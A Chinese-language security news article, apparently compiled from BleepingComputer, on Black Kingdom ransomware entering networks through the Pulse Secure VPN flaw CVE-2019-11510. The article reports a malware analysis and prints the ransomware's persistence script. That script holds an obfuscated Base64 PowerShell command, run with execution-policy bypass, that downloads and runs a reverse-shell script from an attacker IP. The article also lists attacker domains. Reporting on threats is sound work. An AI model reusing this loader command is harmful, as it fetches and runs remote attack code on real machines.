让信息安全
变得简单

Black Kingdom勒索软件利用Pulse VPN漏洞入侵网络

安全研究人员发现,Black Kingdom勒索软件的运营商将目标瞄准具有未修补的Pulse Secure VPN软件或网络初始访问权限的企业。

该恶意软件被捕获在一个蜜罐中,使研究人员可以分析和记录威胁行为者使用的策略。

操作方式

他们正在利用CVE-2019-11510,这是一个影响早于2019年4月修补的Pulse Secure VPN早期版本的严重漏洞。即使漏洞利用公开后,公司也延迟了其软件更新,促使美国政府发出了多次警报,威胁者也开始利用它 ; 一些组织继续运行该产品的漏洞版本。

一家位于波兰的提供网络安全服务的公司REDTEAM.PL观察到,Black Kingdom运营商使用Pulse Secure VPN提供的同一门口违反了他们认为的目标。

从研究人员的观察来看,勒索软件通过模拟合法的Google Chrome计划任务来建立持久性,并用一个字母来表示区别:

GoogleUpdateTaskMachineUSA - Black Kingdom task
GoogleUpdateTaskMachineUA - legitimate Google Chrome task

根据REDTEAM.PL的分析,计划任务在隐藏的PowerShell窗口中运行Base64编码的字符串代码,以获取名为“ reverse.ps1”的脚本,该脚本很可能用于在受感染主机上打开反向Shell。

cversions_cache.ps1 script:

$update = "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQA4AC4AMQAzAC4ANAA5AC4AMQA3ADkALwByAGUAdgBlAHIAcwBlAC4AcABzADEAJwApAA=="

powershell.exe -exec bypass -nologo -Enc $update

REDTEAM.PL  的Adam Ziaja告诉BleepingComputer,无法从攻击者控制的远程服务器中检索脚本,这可能是因为承载该脚本的服务器在交付有效负载之前已被阻塞。

“ reverse.ps1”所在的IP地址是198.13.49.179,由Vultr的子公司Choopa管理,该公司以其提供的廉价虚拟专用服务器(VPS)闻名,并被网络罪犯用来托管其恶意软件。工具。

它解析为三个域,第三个域连接到托管Android和加密货币挖掘恶意软件的美国和意大利的其他服务器。

  • host.cutestboty.com
  • keepass.cutestboty.com
  • anno1119.com

最近出现

Black Kingdom勒索软件最早是在2月下旬由安全研究员  GrujaRS发现的,他发现该勒索软件将.DEMON扩展名附加到了加密文件中。

样品进行分析(1,  2)在接触REDTEAM.PL的报告中发现的相同的IP地址。它放弃了以下赎金票据,要求向比特币钱包中存入10,000美元,并威胁说如果不这样做,将导致数据被破坏或出售。

检查攻击者提供的比特币地址显示余额为空,并且有两个传入交易总计0.55BTC,在撰写本文时已转换为$ 5,200。

 

*编译:Domino

*来自:bleepingcomputer

分享到: 更多 (0)